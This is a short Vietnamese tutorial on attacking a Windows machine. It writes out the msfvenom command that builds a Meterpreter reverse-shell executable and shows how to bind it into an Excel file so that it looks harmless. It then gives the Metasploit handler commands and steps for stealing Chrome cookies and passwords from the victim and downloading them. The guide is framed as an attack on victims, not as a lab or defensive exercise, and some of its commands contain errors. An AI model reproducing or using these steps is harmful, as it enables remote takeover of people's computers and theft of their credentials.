Tấn công mạng TCP

1. tạo virust
- vào trong cửa sổ dòng lệnh của Kali linux
- gõ lệnh : msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.144 LPORT=4444
x > /root/Desktop/cheath.exe

- sẽ tạo 1 file .exe với tên đặt là Cheath.exe,

- vậy khi ta chỉa cần ai đó chạy chường trình này ta có thể tấn công avf truy cập vào máy nạn nhân
2. Ghép viust vào file bất kỳ file nào

- Bước này ta làm đễ người khác dễ chạy chuong trình virust của ta hơn
- Chuyển file virust về máy thục hiện ghép file
- Chúng ta cần chương trình Smart binder 4.0 để ghép file

- Chạy chương trình ghép file

- Đâò tiên ta chọn icon giống với file ta cần ghép để che đi virust
- Chọn biệu tượng mà mình muốn

- Sau khi chọn xong icon ta chọn đến các file cần ghép click: ADD FILE
- Ta chọn file cần ghép với file virust,
- ở đâu chọn file excel tên là: file datasheet

- Sau đó chọn file viust mà ta đã tạo trước đó

- Cần lưu vị trí file ghép và đặt tên

- Xong các bước trên ta sẽ được như hình

- Click vào Bind File để bắt đầu ghép file
- Khi chạy xong ta được 1 file với biểu tượng của excel
- File đó là file đã được cài virust mà ta đã tạo

- Giờ ta có thể gửi file này đến cho nạn nhân bằng cách chủ động hay thụ động
- Khi nạn nhân click vào ta sẽ két nối và điều khiển máy nạn nhân
- File excel nạn nhân mở lên vẫn bình thường như . khong có hiện tượng gì bất thường.

3. Tạo kết nối đến máy nạn nhân

- ở máy tấn công ( máy kali linux) ta tạo đường truyền kết nối đến những nạn nhân đã chạy file
virust của ta
- sử dụng lệnh :
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.20.144
set LPORT 4444
exploite
- ta tạo kết nối đến máy nạn nhân
- đã nhận được kết nối từ máy nạn nhân

- sử dụng lệnh Sysinfo để lấy thông tin máy nạn nhân

4. lấy Cookie, password trên máy nạn nhân

- ta chạy lệnh : cd C:\Users\phv\Desktop\tem

- rồi chạy lệnh : hack-browses-data.exe để chạy chương trình quét cookie trên máy nạn nhân
- chương chình hiện ra những file chrome_password.csv , chrome_cookie.csv là ta thành công

- giờ ta chở lại màn hình shell

- thực hiện lệnh copy các file về
- lệnh :
download C:\\Users\\phv\\Desktop\\tem\\results\\chrome_cookie.csv /root/Desktop
download C:\\Users\\phv\\Desktop\\tem\\results\\ chrome_cookie.csv /root/Desktop
- và ở Desktop ta đã nhận được 2 file chrome_cookie.csv và chrome_cookie.csv.
- ta có thể mở lên và thấy được password ta đã quét trên máy nạn nhân